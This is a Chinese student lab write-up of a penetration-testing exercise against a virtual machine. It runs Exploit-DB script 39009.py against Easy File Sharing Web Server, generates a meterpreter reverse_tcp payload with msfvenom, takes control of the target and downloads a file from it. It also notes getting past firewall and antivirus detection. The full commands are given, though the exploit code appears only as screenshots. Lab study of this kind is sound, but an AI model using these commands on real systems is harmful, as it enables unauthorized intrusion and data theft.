zoukankan      html  css  js  c++  java
  • 漏洞渗透的简单测试

    一、漏洞渗透测试

    1、靶机安装easy file sharing server(efssetup_2018.zip)

    2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100

    3、利用该漏洞,使得靶机运行计算器。P116-119

    具体实现过程:

    1. 使用namp扫描目标计算机:

    查看目标计算机的相关信息

    image-20200517210304026

    1. 查找EasyFileSharing的有关漏洞:

    image-20200517210314710

    1. 查看脚本代码:

    ​ 截图

    image-20200517210328997

    image-20200517210334772

    image-20200517210340764

    1. 执行该脚本:

    ​ 使用命令:python /usr/share/exploitdb/exploits/windows/remote/39009.py 目标IP

    image-20200517210353325

    1. 执行结果:

    ​ Easy File Sharing Web Server服务崩溃,运行计算机

    image-20200517210407180

    二、Metasploit应用

    1、生成主控端、被控端。

    2、获得靶机(Windows)控制权。

    3、下载靶机上任意一个文件。

    P121-123;140-145

    具体过程:

    1. 生成一个被控端

    命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=目标IP lport=5000 -f exe -o /root/payload.exe

    image-20200517210419874

    生成的文件:

    image-20200517210428436

    1. 生成主控端后,在目标计算机运行被控端,获得目标计算机的控制权,如图所示:

    image-20200517210441798

    1. 对目标计算机的控制操作

    查看目标计算机的文件信息,并下载文件hxy.txt文件

    Ls //查看

    Download 文件名 //下载文件

    image-20200517210452167

    image-20200517210500262

    总结:经过对多台不同的虚拟机的测试尝试,初步掌握了漏洞测试的基本操作,以及加深了对漏洞渗透测试的理解。遇到的问题:生成的被控端payload会被系统辨别为木马,需要将被控端进行压缩或者关闭防火墙,才能将被控端发送到靶机上。尝试过在物理机上运行Easy File Sharing Web Server服务,然后在Kali上运行相应的py脚本,kali上显示运行成功,但是计算机上没有任何反应,猜想是防火墙阻止了该脚本的运行。

  • 相关阅读:
    mysql修改数据表名
    HDU 5742 It's All In The Mind (贪心)
    HDU 5752 Sqrt Bo (数论)
    HDU 5753 Permutation Bo (推导 or 打表找规律)
    HDU 5762 Teacher Bo (暴力)
    HDU 5754 Life Winner Bo (博弈)
    CodeForces 455C Civilization (并查集+树的直径)
    CodeForces 455B A Lot of Games (博弈论)
    CodeForces 455A Boredom (DP)
    HDU 4861 Couple doubi (数论 or 打表找规律)
  • 原文地址:https://www.cnblogs.com/thresh/p/12906971.html
Copyright © 2011-2022 走看看